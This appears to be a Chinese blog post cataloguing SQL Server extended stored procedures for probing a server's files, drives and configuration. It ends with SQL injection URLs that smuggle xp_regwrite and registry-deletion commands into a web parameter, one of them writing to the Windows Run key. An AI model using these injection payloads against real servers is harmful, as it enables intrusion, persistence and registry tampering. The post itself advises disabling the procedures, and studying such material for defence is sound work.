• sql server中扩展存储过程大全


    --获得MS SQL的版本号
    execute master..sp_msgetversion

    --得到硬盘文件信息
    --参数说明:目录名,目录深度,是否显示文件
    execute master..xp_dirtree 'c:'
    execute master..xp_dirtree 'c:',1
    execute master..xp_dirtree 'c:',1,1


    --列出服务器上安装的所有OLEDB提供的程序
    execute master..xp_enum_oledb_providers

    --列出服务器上安装的所有代码页
    execute master..xp_enumcodepages

    --列出服务器上配置的dsn
    execute master..xp_enumdsn

    --列出sql server错误日志列表,最后更新时间
    execute master..xp_enumerrorlogs

    --列出服务器上所有windows本地组
    execute master..xp_enumgroups

    --检测文件存在性
    execute master..xp_fileexist 'c:\a.bak'

    declare @flag int

    exec master..xp_fileexist 'c:\abc.bak',@flag out

    if @flag=1
    begin
    print 'exist'
    end
    else
    begin
    print 'no exist'
    end

    --列出服务器上固定驱动器,以及每个驱动器的可用空间
    execute master..xp_fixeddrives


    --得到当前sql server服务器的计算机名称
    execute master..xp_getnetname

    --列出当前错误日志的具体内容
    EXEC [master].[dbo].[xp_readerrorlog]

    --列出指定目录的所有下一级子目录
    EXEC [master].[dbo].[xp_subdirs] 'c:\WINNT'


    ---列出驱动器的名称
    --以字节为单位的空闲空间(low free)
    --以驱动器类型:软驱(1),硬盘(2),cd-rom(8)
    EXEC [master].[dbo].[xp_availablemedia]
    --效果如下:

    name low free high free media type
    C:\ 1270386688 0 2
    D:\ 1726824448 2 2
    E:\ 875053056 10 2
    F:\ 0 0 8

    还有在[master].[dbo].[sp_addlogin]里面有加密函数pwdencrypt,大家感兴趣可以试试


    SQL Server中包含了几个可以访问系统注册表的扩展存储过程.但实际上这几个扩展存储过程是未公开的,从sql server 7.0就有了,
    在SQL server 2000中仍然保留,他们以后可能会删除.但是这几个存储过程却提供了在当前的SQL Server版本中访问系统注册表的能力,
    而且很多人利用SQL Server来进行攻击系统时,往往都会用到这几个扩展存储过程.所以最好在SQL Server中禁用他们.
    http://127.0.0.1/view.asp?id=165
    存在mssql的sql注入,那么
    xp_regwrite 写入注册表
    使用方法:
    xp_regwrite 根键,子键, 值名, 值类型, 值
    http://127.0.0.1/view.asp?id=165;exec master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\run','TestValueName','reg_sz','hello'
    注意值类型有2种REG_SZ 表示字符型,REG_DWORD 表示整型

    xp_regdeletevalue 删除某个值
    使用方法:
    xp_regdeletevalue 根键,子键,值名
    http://127.0.0.1/view.asp?id=165;exec master.xp_regdeletevalue 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName'

    xp_regdeletekey 删除键,包括该键下所有值

    使用方法:
    http://127.0.0.1/view.asp?id=165;exec master.xp_regdeletekey 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Testkey'

  • 相关阅读:
    Java Web学习笔记---用GET实现搜索引擎
    Docker之docker log详解
    Docker之save、load、export、import命令
    Docker之镜像地址
    GIT使用详解
    Docker之commit制作镜像
    Python之sys.arg[]的用法解释
    python常用内置函数
    VBA精彩代码分享-1
    C#读写EXCEL单元格的问题
  • 原文地址:https://www.cnblogs.com/itecho/p/1374118.html
Copyright © 2020-2023  润新知